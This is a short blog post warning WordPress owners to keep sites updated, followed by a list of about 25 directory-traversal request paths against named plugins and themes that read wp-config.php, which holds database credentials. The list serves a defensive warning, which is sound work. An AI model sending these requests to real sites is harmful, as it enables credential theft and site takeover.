Wordpress-start-image

Beware WordPress WP Exploits

Arguably ( well I’ll argue it ) the worlds most beloved and used solution for content management of a website is WordPress, mostly for it’s ease of installation, huge library of third party plugins and extension, and massive support by the design community.

But that massive support also provides massive exsposure of the code, code structure, and provides those that would take advantage and opportunity to do so….but don’t get me wrong, all CMS’s software systems that provide their code for developer to expand and create on have the same problem.

If you do nothing else make sure your WP is reviewed and updated monthly, your plugins and theme are updated, and avoid the following exploits that are causing havoc with sites everywhere:

WordPress Exploits:

  • /wp-content/force-download.php?file=../wp-config.php HTTP/1.1
  • /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../..
  • /wp-config.php HTTP/1.1
  • /wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php HTTP/1.1
  • /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php HTTP/1.1
  • /wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php HTTP/1.1
  • /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php HTTP/1.1
  • /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/Newspapertimes_1/download.php?filename=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/SMWF/inc/download.php?file=../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/felis/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/jarida/download.php?uri=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/markant/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1
  • /wp-content/themes/tess/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/yakimabait/download.php?file=../../../wp-config.php HTTP/1.1
  • /wp-content/themes/ypo-theme/download.php?download=../../../wp-config.php HTTP/1.1